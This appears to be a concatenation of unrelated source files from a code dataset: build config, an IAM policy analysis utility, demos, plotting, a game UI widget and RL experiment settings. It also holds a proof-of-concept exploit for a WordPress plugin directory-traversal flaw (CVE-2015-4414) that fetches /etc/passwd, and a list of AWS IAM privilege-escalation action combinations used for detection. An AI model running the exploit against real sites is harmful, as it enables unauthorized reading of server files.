'<(libjingle_source)/talk/media/devices/macdevicemanager.cc',
'<(libjingle_source)/talk/media/devices/macdevicemanager.h',
'<(libjingle_source)/talk/media/devices/macdevicemanagermm.mm',
],
'xcode_settings': {
'WARNING_CFLAGS': [
# Suppres warnings about using deprecated functions in
# macdevicemanager.cc.
'-Wno-deprecated-declarations',
],
},
}],
],
}],
],
'dependencies': [
'<(DEPTH)/third_party/libsrtp/libsrtp.gyp:libsrtp',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:media_file',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:video_capture_module',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:video_render_module',
'libjingle',
],
}, # target libpeerconnection
{
'target_name': 'libpeerconnection',
'type': '<(libpeer_target_type)',
'sources': [
'<(libjingle_source)/talk/media/webrtc/webrtcvideoengine.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoengine.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvoiceengine.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvoiceengine.h',
],
'dependencies': [
'<(DEPTH)/third_party/webrtc/system_wrappers/source/system_wrappers.gyp:system_wrappers',
'<(DEPTH)/third_party/webrtc/video_engine/video_engine.gyp:video_engine_core',
'<(DEPTH)/third_party/webrtc/voice_engine/voice_engine.gyp:voice_engine_core',
'<@(libjingle_peerconnection_additional_deps)',
'libjingle_webrtc',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/libjingle/libjingle.gyp:libjingle_webrtc',
],
'conditions': [
['libpeer_allocator_shim==1 and '
'libpeer_target_type=="shared_library" and '
'component!="shared_library"', {
'sources': [
'overrides/allocator_shim/allocator_proxy.cc',
],
}],
['"<(libpeer_target_type)"=="shared_library"', {
# Used to control symbol export/import.
'defines': [ 'LIBPEERCONNECTION_IMPLEMENTATION=1' ],
}],
['OS=="win" and "<(libpeer_target_type)"=="shared_library"', {
'link_settings': {
'libraries': [
'-lsecur32.lib',
'-lcrypt32.lib',
'-liphlpapi.lib',
],
},
}],
['OS=="mac" and libpeer_target_type=="shared_library"', {
'xcode_settings': {
'DYLIB_INSTALL_NAME_BASE': '@loader_path/Libraries',
},
'product_dir': '<(PRODUCT_DIR)/Libraries',
}],
['OS=="android"', {
'standalone_static_library': 1,
}],
],
}, # target peerconnection
],
}],
],
}
| 46.754116 | 101 | 0.5943 |
204494a933c2d0d819d669f4937fb5d298c605d9 | 6,885 | py | Python | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | import functools
import logging
import re
from typing import Set, List, Optional, Iterable, Dict
@functools.lru_cache(maxsize=None)
def is_action_fully_defined(contained_action: str, container_action: str):
try:
if container_action == '*':
return True
if contained_action == '*':
return False
contained_splitted = contained_action.split(':')
container_splitted = container_action.split(':')
if not contained_splitted[0] == container_splitted[0]:
return False
pattern = re.compile(container_action.replace('*', '.*', -1))
return pattern.fullmatch(contained_action)
except Exception:
logging.exception('got exception while checking action {} vs {}'.format(contained_action, container_action))
return False
def get_intersected_actions(actions: Iterable[str], action: str) -> List[str]:
results = [get_intersect_action(action, action_from_set) for action_from_set in actions]
return [result for result in results if result is not None]
@functools.lru_cache(maxsize=None)
def get_intersect_action(action_a: str, action_b: str) -> Optional[str]:
if is_action_fully_defined(action_a, action_b):
return action_a
if is_action_fully_defined(action_b, action_a):
return action_b
return None
def is_combo_escalation_permissions_match(actions: Set[str]) -> bool:
esc_actions_list: List[Set[str]] = _get_actions_combo_by_action_prefix(actions)
for action in actions:
for esc_actions_combo in esc_actions_list:
for esc_action in set(esc_actions_combo):
if attribute_match(action, esc_action):
esc_actions_combo.remove(esc_action)
if len(esc_actions_combo) == 0:
return True
return False
@functools.lru_cache(maxsize=None)
def attribute_match(src_attr: str, target_attr: str):
src_attr = src_attr.replace("*", ".*").replace(" ", "")
target_attr = target_attr.replace(" ", "")
return re.search(src_attr, target_attr)
def _get_actions_combo_by_action_prefix(actions: Set[str]) -> List[Set[str]]:
esc_actions_map: Dict[str, List[Set[str]]] = {}
for action in actions:
action_prefix: str = parse_service_name(action)
if action_prefix not in esc_actions_map:
esc_actions_map[action_prefix] = get_esc_action_set_list(action_prefix)
return [esc_actions_set for esc_actions_set_list in esc_actions_map.values() for esc_actions_set in esc_actions_set_list]
@functools.lru_cache(maxsize=None)
def parse_service_name(action: str) -> str:
return action.split(":")[0]
def get_esc_action_set_list(action_prefix: str) -> List[Set[str]]:
action_set_list: List[Set] = []
if action_prefix == "iam":
for key, actions_set_list in SERVICE_TO_ESC_ACTIONS_COMBO_SETS.items():
if key.__contains__(action_prefix):
for actions_set in actions_set_list:
action_set_list.append(set(actions_set))
else:
for actions_set in SERVICE_TO_ESC_ACTIONS_COMBO_SETS.get(action_prefix, []) + \
SERVICE_TO_ESC_ACTIONS_COMBO_SETS.get("iam" + action_prefix, []):
action_set_list.append(set(actions_set))
return action_set_list
LAMBDA_UPDATE_ACTION: str = "lambda:updatefunctioncode"
LAMBDA_INVOKE_FUNCTION_ACTION: str = "lambda:invokefunction"
LAMBDA_CREATE_EVENT_ACTION: str = "lambda:createeventsourcemapping"
LAMBDA_CREATE_FUNCTION_ACTION: str = "lambda:createfunction"
EC2_RUN_INSTANCE_ACTION: str = "ec2:runinstances"
IAM_CREATE_KEY_ACTION: str = "iam:CreateAccessKey"
IAM_CREATE_PROFILE_ACTION: str = "iam:CreateLoginProfile"
IAM_UPDATE_PROFILE_ACTION: str = "iam:UpdateLoginProfile"
IAM_PASS_ROLE_ACTION: str = "iam: passrole"
IAM_ALL_ACTIONS: str = "iam:*"
IAM_CREATE_POLICY_VERSION_ACTION: str = "iam: CreatePolicyVersion"
IAM_SET_DEFAULT_POLICY_VERSION_ACTION: str = "iam: SetDefaultPolicyVersion"
IAM_PUT_USER_POLICY_ACTION: str = "iam: PutUserPolicy"
IAM_PUT_GROUP_POLICY_ACTION: str = "iam: PutGroupPolicy"
IAM_PUT_ROLE_POLICY_ACTION: str = "iam: PutRolePolicy"
IAM_ATTACH_USER_POLICY_ACTION: str = "iam: AttachUserPolicy"
IAM_ATTACH_GROUP_POLICY_ACTION: str = "iam: AttachGroupPolicy"
IAM_ATTACH_ROLE_POLICY_ACTION: str = "iam: AttachRolePolicy"
IAM_ADD_USER_GROUP_ACTION: str = "iam: AddUserToGroup"
GLUE_UPDATE_EVENT_ACTION: str = "glue: updatedevendpoint"
GLUE_CREATE_EVENT_ACTION: str = "glue: createdevendpoint"
CLOUD_FORMATION_CREATE_ACTION: str = "cloudformation:createstack"
DATA_PIPELINE_CREATE_ACTION: str = "datapipeline:createpipeline"
ACTIONS_EXCLUDE_LIST: List[str] = [IAM_CREATE_KEY_ACTION, IAM_CREATE_PROFILE_ACTION, IAM_UPDATE_PROFILE_ACTION, LAMBDA_UPDATE_ACTION]
SERVICE_TO_ESC_ACTIONS_COMBO_SETS: Dict[str, List[Set[str]]] = \
{
"iam": [
{IAM_ALL_ACTIONS}, {IAM_CREATE_POLICY_VERSION_ACTION}, {IAM_SET_DEFAULT_POLICY_VERSION_ACTION}, {IAM_PUT_USER_POLICY_ACTION},
{IAM_PUT_GROUP_POLICY_ACTION},
{IAM_PUT_ROLE_POLICY_ACTION}, {IAM_ATTACH_USER_POLICY_ACTION}, {IAM_ATTACH_GROUP_POLICY_ACTION}, {IAM_ATTACH_ROLE_POLICY_ACTION},
{IAM_ADD_USER_GROUP_ACTION}, {IAM_CREATE_KEY_ACTION}, {IAM_CREATE_PROFILE_ACTION}
],
"glue": [{GLUE_UPDATE_EVENT_ACTION}],
"lambda": [{LAMBDA_UPDATE_ACTION}],
"iamec2": [{IAM_PASS_ROLE_ACTION, EC2_RUN_INSTANCE_ACTION}],
"iamlambda": [{IAM_PASS_ROLE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_INVOKE_FUNCTION_ACTION},
{IAM_PASS_ROLE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_CREATE_EVENT_ACTION}
],
"iamglue": [{IAM_PASS_ROLE_ACTION, GLUE_CREATE_EVENT_ACTION}],
"iamcloudformation": [{IAM_PASS_ROLE_ACTION, CLOUD_FORMATION_CREATE_ACTION}],
"iamdatapipeline": [{IAM_PASS_ROLE_ACTION, DATA_PIPELINE_CREATE_ACTION}],
"*": [{"*"}]
}
SERVICE_TO_ESC_ACTIONS_LIST: Dict[str, List[str]] = \
{
"iam": [
IAM_ALL_ACTIONS, IAM_CREATE_POLICY_VERSION_ACTION, IAM_SET_DEFAULT_POLICY_VERSION_ACTION, IAM_PUT_USER_POLICY_ACTION,
IAM_PUT_GROUP_POLICY_ACTION,
IAM_PUT_ROLE_POLICY_ACTION, IAM_ATTACH_USER_POLICY_ACTION, IAM_ATTACH_GROUP_POLICY_ACTION, IAM_ATTACH_ROLE_POLICY_ACTION,
IAM_ADD_USER_GROUP_ACTION, IAM_CREATE_KEY_ACTION, IAM_CREATE_PROFILE_ACTION, IAM_PASS_ROLE_ACTION
],
"glue": [GLUE_UPDATE_EVENT_ACTION, GLUE_CREATE_EVENT_ACTION],
"lambda": [
LAMBDA_UPDATE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_INVOKE_FUNCTION_ACTION, LAMBDA_CREATE_EVENT_ACTION
],
"ec2": [EC2_RUN_INSTANCE_ACTION],
"cloudformation": [CLOUD_FORMATION_CREATE_ACTION],
"datapipeline": [DATA_PIPELINE_CREATE_ACTION],
"*": ["*"]
}
| 45.296053 | 141 | 0.726943 |
88437af62836d7de164e8d66f2918e6420066870 | 1,370 | py | Python | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
] | null | null | null | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
] | null | null | null | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
] | null | null | null | import logging
fmt = '{asctime} {levelname:<8} {filename:>3}:{lineno:<3} {name:>10} {message}'
datefmt = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(level='DEBUG', format=fmt, datefmt=datefmt, style='{')
log = logging.getLogger()
def bump_version():
pass
def configure():
log.debug(f"Collecting parameters")
log.debug(f"Ask for confirmation")
log.info(f"Save configuration")
def select_target():
log.warning(f"Default target selected")
def prepare():
log.debug(f"Bump version")
bump_version()
log.debug(f"Generate configuration")
configure()
log.debug(f"Select target")
select_target()
def call_compiler():
log.debug(f"Preprocess sources")
log.info(f"Compile sources")
def call_linker():
log.info(f"Link objects")
def build_executable():
# Note that callables that don't invoke logging
# don't create additional indentation
call_compiler()
call_linker()
def build_package():
log.warning(f"Symbols will be removed")
log.debug(f"Strip binary")
log.debug(f"Add meta data")
log.debug(f"Create archive")
def upload_package():
pass
def release_app():
log.debug(f"Prepare")
prepare()
log.info(f"Build executable")
build_executable()
log.info(f"Build package")
build_package()
log.info(f"Upload package")
upload_package()
release_app()
| 19.571429 | 79 | 0.670803 |
aa0e46854cbe3f24783514643a1adffb2c97541c | 2,660 | py | Python | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null | src/plot_kernels_appendix.py | jhgoebbert/BSTIM-Covid19 | b927b1ab60ff915b988ff32b78189a0e61cceb45 | [
"MIT"
] | null | null | null |
from ModelInstance import ModelInstance
from matplotlib import rc
import matplotlib
import numpy as np
import pickle as pkl
from sampling_utils import *
from shared_utils import load_data, split_data
import datetime
from matplotlib import pyplot as plt
plt.style.use('ggplot')
matplotlib.rcParams['text.usetex'] = True
matplotlib.rcParams['text.latex.unicode'] = True
plt.rcParams["font.family"] = "Bitstream Charter"
diseases = ["campylobacter", "rotavirus", "boreliosis"]
prediction_regions = ["germany", "bavaria"]
locs = np.linspace(-100, 100, 200)
ts = np.linspace(0 * 7 * 24 * 3600, 5 * 7 * 24 * 3600, 200)
dt = tt.fvector("dt")
dx = tt.fvector("dx")
temporal_bfs = tt.stack(bspline_bfs(dt, np.array(
[0, 0, 1, 2, 3, 4, 5]) * 7 * 24 * 3600.0, 2), axis=0)
spatial_bfs = tt.stack([gaussian_bf(dx, σ)
for σ in [6.25, 12.5, 25.0, 50.0]], axis=0)
temporal_bfs = theano.function(
[dt], temporal_bfs, allow_input_downcast=True)(ts)
spatial_bfs = theano.function(
[dx], spatial_bfs, allow_input_downcast=True)(locs)
fig = plt.figure(figsize=(12, 12))
grid = plt.GridSpec(len(spatial_bfs) + 1, len(temporal_bfs) + 1, top=0.92,
bottom=0.07, left=0.09, right=0.93, hspace=0.2, wspace=0.2)
ax0 = fig.add_subplot(grid[:, :])
ax00 = fig.add_subplot(grid[0, 0])
#ax00.pcolormesh(_t, x, Kc.T)
# ax00.set_xticks(tticks)
# ax00.set_xticklabels(tticks_l)
# ax00.xaxis.tick_top()
ax00.set_visible(False)
# ax00.set_xlim(-1,30)
for k in range(4):
ax = fig.add_subplot(grid[0, 1 + k], sharex=ax00)
ax.plot(ts / (24 * 3600), temporal_bfs[k, :])
ax.set_ylim(0, 1)
ax.xaxis.tick_top()
ax.tick_params(labelsize=18, length=6, labelleft=k == 0)
for k in range(4):
ax = fig.add_subplot(grid[1 + k, 0], sharey=ax00)
ax.plot(spatial_bfs[k, :], locs)
ax.set_xlim(0.1, 0)
ax.xaxis.tick_bottom()
ax.tick_params(labelsize=18, length=6, labelbottom=k == 3)
for i in range(4):
for j in range(4):
ax = fig.add_subplot(grid[1 + i, 1 + j], sharex=ax00, sharey=ax00)
K = spatial_bfs[i, :].reshape(
(-1, 1)) * temporal_bfs[j, :].reshape((1, -1))
ax.contourf(ts / (24 * 3600), locs, K)
ax.set_rasterized(True)
ax.tick_params(labelbottom=False, labelleft=False,
labelsize=18, length=6)
ax0.set_xlabel("temporal distance [days]", fontsize=22)
ax0.set_ylabel("spatial distance [km]", fontsize=22)
ax0.set_frame_on(False)
ax0.set_xticks([])
ax0.set_yticks([])
ax0.yaxis.set_label_position("right")
#fig.suptitle("Interaction Effect Basis", fontsize=18)
# fig.savefig("../figures/kernels_appendix.pdf")
plt.show()
| 32.439024 | 79 | 0.662782 |
7186854eccd12766509d49fa4d71cc0c16528ffa | 192 | py | Python | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | ex003.py | almmessias/CursoPython | 4cec6946f32002cbd5d3b802df11ea1ba74169f5 | [
"MIT"
] | null | null | null | valor1 = int (input ('Digite o primeiro valor: '))
valor2 = int (input ('Digite o segundo valor: '))
soma = valor1 + valor2
print ('A soma entre {} e {} vale {}'.format(valor1, valor2, soma)) | 38.4 | 67 | 0.651042 |
681450bd0014566fad289ba57936a4eec48fbc30 | 7,869 | py | Python | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | pyxel/ui/widget.py | sacredhotdog/pyxel | 08da48dbd1ac53c06cf8a383f28d66fd89f78f4a | [
"MIT"
] | null | null | null | import pyxel
from .constants import (
WIDGET_CLICK_DIST,
WIDGET_CLICK_TIME,
WIDGET_HOLD_TIME,
WIDGET_PANEL_COLOR,
WIDGET_REPEAT_TIME,
WIDGET_SHADOW_COLOR,
)
class Widget:
"""
Events:
__on_show()
__on_hide()
__on_enabled()
__on_disabled()
__on_move(x, y)
__on_resize(width, height)
__on_mouse_down(key, x, y)
__on_mouse_up(key, x, y)
__on_mouse_drag(key, x, y, dx, dy)
__on_mouse_repeat(key, x, y)
__on_mouse_click(key, x, y)
__on_mouse_hover(x, y)
__on_update()
__on_draw()
"""
class CaptureInfo:
widget = None
key = None
time = None
press_pos = None
last_pos = None
_capture_info = CaptureInfo()
def __init__(
self, parent, x, y, width, height, *, is_visible=True, is_enabled=True
):
self._parent = None
self._children = []
self._x = None
self._y = None
self._width = None
self._height = None
self._is_visible = None
self._is_enabled = None
self._event_handler_lists = {}
self.parent = parent
self.move(x, y)
self.resize(width, height)
self.is_visible = is_visible
self.is_enabled = is_enabled
@property
def parent(self):
return self._parent
@parent.setter
def parent(self, value):
if self._parent:
self._parent._children.remove(self)
self._parent = value
if value:
value._children.append(self)
@property
def x(self):
return self._x
@property
def y(self):
return self._y
@property
def width(self):
return self._width
@property
def height(self):
return self._height
@property
def is_visible(self):
return self._is_visible
@is_visible.setter
def is_visible(self, value):
if self._is_visible == value:
return
self._is_visible = value
if value:
self.call_event_handler("show")
else:
self.call_event_handler("hide")
@property
def is_enabled(self):
return self._is_enabled
@is_enabled.setter
def is_enabled(self, value):
if self._is_enabled == value:
return
self._is_enabled = value
if value:
self.call_event_handler("enabled")
else:
self.call_event_handler("disabled")
def _get_event_handler_list(self, event):
if event not in self._event_handler_lists:
self._event_handler_lists[event] = []
return self._event_handler_lists[event]
def add_event_handler(self, event, handler):
self._get_event_handler_list(event).append(handler)
def remove_event_handler(self, event, handler):
self._get_event_handler_list(event).remove(handler)
def call_event_handler(self, event, *args):
for handler in self._get_event_handler_list(event):
handler(*args)
def is_hit(self, x, y):
return (
x >= self._x
and x <= self._x + self._width - 1
and y >= self._y
and y <= self._y + self._height - 1
)
def move(self, x, y):
if self._x == x and self._y == y:
return
if self._x is None or self._y is None:
self._x = x
self._y = y
dx = x - self._x
dy = y - self._y
self._move_delta(dx, dy)
def _move_delta(self, dx, dy):
self._x += dx
self._y += dy
self.call_event_handler("move", self._x, self._y)
for child in self._children:
child._move_delta(dx, dy)
def resize(self, width, height):
if self._width == width and self._height == height:
return
self._width = width
self._height = height
self.call_event_handler("resize", width, height)
def draw_panel(self, x, y, width, height, *, with_shadow=True):
x1 = x
y1 = y
x2 = x + width - 1
y2 = y + height - 1
pyxel.line(x1 + 1, y1, x2 - 1, y1, WIDGET_PANEL_COLOR)
pyxel.rect(x1, y1 + 1, x2, y2 - 1, WIDGET_PANEL_COLOR)
pyxel.line(x1 + 1, y2, x2 - 1, y2, WIDGET_PANEL_COLOR)
if with_shadow:
pyxel.line(x1 + 2, y2 + 1, x2, y2 + 1, WIDGET_SHADOW_COLOR)
pyxel.line(x2 + 1, y1 + 2, x2 + 1, y2, WIDGET_SHADOW_COLOR)
pyxel.pix(x2, y2, WIDGET_SHADOW_COLOR)
def _capture_mouse(self, key):
Widget._capture_info.widget = self
Widget._capture_info.key = key
Widget._capture_info.time = pyxel.frame_count
Widget._capture_info.press_pos = (pyxel.mouse_x, pyxel.mouse_y)
Widget._capture_info.last_pos = Widget._capture_info.press_pos
def _release_mouse(self):
Widget._capture_info.widget = None
Widget._capture_info.key = None
Widget._capture_info.time = None
Widget._capture_info.press_pos = None
Widget._capture_info.last_pos = None
def update_widgets(self):
capture_widget = Widget._capture_info.widget
if capture_widget:
capture_widget._process_capture()
else:
self._process_input()
self._update()
def _process_capture(self):
capture_info = Widget._capture_info
last_mx, last_my = capture_info.last_pos
mx = pyxel.mouse_x
my = pyxel.mouse_y
if mx != last_mx or my != last_my:
self.call_event_handler(
"mouse_drag", capture_info.key, mx, my, mx - last_mx, my - last_my
)
capture_info.last_pos = (mx, my)
if self.is_hit(mx, my):
self.call_event_handler("mouse_hover", mx, my)
if pyxel.btnp(capture_info.key, WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME):
self.call_event_handler("mouse_repeat", capture_info.key, mx, my)
if pyxel.btnr(capture_info.key):
self.call_event_handler("mouse_up", capture_info.key, mx, my)
press_x, press_y = capture_info.press_pos
if (
pyxel.frame_count <= capture_info.time + WIDGET_CLICK_TIME
and abs(pyxel.mouse_x - press_x) <= WIDGET_CLICK_DIST
and abs(pyxel.mouse_y - press_y) <= WIDGET_CLICK_DIST
):
self.call_event_handler("mouse_click", capture_info.key, mx, my)
self._release_mouse()
def _process_input(self):
if not self._is_visible:
return False
if self._is_enabled:
for widget in reversed(self._children):
if widget._process_input():
return True
else:
return False
mx = pyxel.mouse_x
my = pyxel.mouse_y
if self.is_hit(mx, my):
key = None
if pyxel.btnp(pyxel.KEY_LEFT_BUTTON):
key = pyxel.KEY_LEFT_BUTTON
elif pyxel.btnp(pyxel.KEY_RIGHT_BUTTON):
key = pyxel.KEY_RIGHT_BUTTON
elif pyxel.btnp(pyxel.KEY_MIDDLE_BUTTON):
key = pyxel.KEY_MIDDLE_BUTTON
if key is not None:
self._capture_mouse(key)
self.call_event_handler("mouse_down", key, mx, my)
self.call_event_handler("mouse_hover", mx, my)
return True
return False
def _update(self):
if not self._is_visible:
return
self.call_event_handler("update")
for child in self._children:
child._update()
def draw_widgets(self):
if not self._is_visible:
return
self.call_event_handler("draw")
for child in self._children:
child.draw_widgets()
| 26.40604 | 82 | 0.577837 |
7325df797eee7cf16507071f4e32000bdc795e7c | 1,835 | py | Python | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 421 | 2021-12-07T08:46:40.000Z | 2022-03-31T12:42:16.000Z | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 5 | 2022-03-27T07:37:32.000Z | 2022-03-31T13:56:11.000Z | 2015/CVE-2015-4414/poc/pocsploit/CVE-2015-4414.py | hjyuan/reapoc | ef515e56c44c2590ff8601582bf6c08e076e7083 | [
"Apache-2.0"
] | 144 | 2021-12-07T11:06:14.000Z | 2022-03-31T07:41:35.000Z | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal''',
"description": '''Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.''',
"severity": "high",
"references": [
"https://www.exploit-db.com/exploits/37274",
"https://www.cvedetails.com/cve/CVE-2015-4414"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "root:" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | 28.671875 | 279 | 0.562398 |
e27e9489ff8753f3a60d4686d7f369a5249b39b4 | 668 | py | Python | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | manage.py | srivarkor/SampleAPI | 0cce27463dfd3669c0b92e923bf68ed4b0212de4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'UsersProject.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 29.043478 | 76 | 0.681138 |
2cc9ce18c24704217fde3b579ff06dc5ad36fd87 | 1,644 | py | Python | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | deepdrive_zero/experiments/intersection_2_agents_fine_tune_test.py | shantanuwadnerkar/deepdrive-zero | 3134a5b092a53ff60e4207d7419fd6a19cb5a6e9 | [
"MIT"
] | null | null | null | import os
import sys
from deepdrive_zero.experiments import utils
from spinup.utils.run_utils import ExperimentGrid
from spinup import ppo_pytorch
import torch
experiment_name = os.path.basename(__file__)[:-3]
notes = """Adding yield to left input and reward"""
env_config = dict(
env_name='deepdrive-2d-intersection-w-gs-allow-decel-v0',
is_intersection_map=True,
expect_normalized_action_deltas=False,
jerk_penalty_coeff=0.20 / (60*100),
gforce_penalty_coeff=0.06,
collision_penalty_coeff=4,
end_on_harmful_gs=False,
incent_win=True,
constrain_controls=False,
incent_yield_to_oncoming_traffic=False,
)
net_config = dict(
hidden_units=(256, 256),
activation=torch.nn.Tanh
)
eg = ExperimentGrid(name=experiment_name)
eg.add('env_name', env_config['env_name'], '', False)
# eg.add('seed', 0)
eg.add('resume', '/home/c2/src/tmp/spinningup/data/intersection_2_agents_fine_tune_collision_resume_add_comfort5/intersection_2_agents_fine_tune_collision_resume_add_comfort5_s0_2020_03-15_16-14.51')
eg.add('reinitialize_optimizer_on_resume', True)
eg.add('num_inputs_to_add', 0)
eg.add('pi_lr', 3e-6)
eg.add('vf_lr', 1e-5)
# eg.add('boost_explore', 10)
eg.add('epochs', 8000)
eg.add('steps_per_epoch', 16000)
eg.add('ac_kwargs:hidden_sizes', net_config['hidden_units'], 'hid')
eg.add('ac_kwargs:activation', net_config['activation'], '')
eg.add('notes', notes, '')
eg.add('run_filename', os.path.realpath(__file__), '')
eg.add('env_config', env_config, '')
def train():
eg.run(ppo_pytorch)
if __name__ == '__main__':
utils.run(train_fn=train, env_config=env_config, net_config=net_config) | 31.615385 | 199 | 0.754866 |
266f6ed6d3e092c83d3c7800e37ff9b501807265 | 434 | py | Python | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/compare-within-margin/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
test.it('No margin')
test.assert_equals(close_compare(4, 5), -1)
test.assert_equals(close_compare(5, 5), 0)
test.assert_equals(close_compare(6, 5), 1)
test.it('With margin of 3')
test.assert_equals(close_compare(2, 5, 3), 0)
test.assert_equals(close_compare(5, 5, 3), 0)
test.assert_equals(close_compare(8, 5, 3), 0)
test.assert_equals(close_compare(8.1, 5, 3), 1)
test.assert_equals(close_compare(1.99, 5, 3), -1)
| 31 | 49 | 0.723502 |
874dad16c579924936a2e45f638241115bc94fca | 2,320 | py | Python | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | tatudashboard/exceptions.py | pinodeca/tatu-dashboard | 1685f7c862c2d3502abd51d9ff4f2a12b147680c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
class Base(Exception):
def __init__(self, message=None):
if not message:
message = self.__class__.__name__
super(Base, self).__init__(message)
class UnsupportedVersion(Base):
pass
class ResourceNotFound(Base):
pass
class NoUniqueMatch(Base):
pass
class RemoteError(Base):
def __init__(self, message=None, code=None, type=None, errors=None,
request_id=None, **ignore):
err_message = self._get_error_message(message, type, errors)
self.message = err_message
self.code = code
self.type = type
self.errors = errors
self.request_id = request_id
super(RemoteError, self).__init__(err_message)
def _get_error_message(self, _message, _type, _errors):
# Try to get a useful error msg if 'message' has nothing
if not _message:
if _errors and 'errors' in _errors:
err_msg = list()
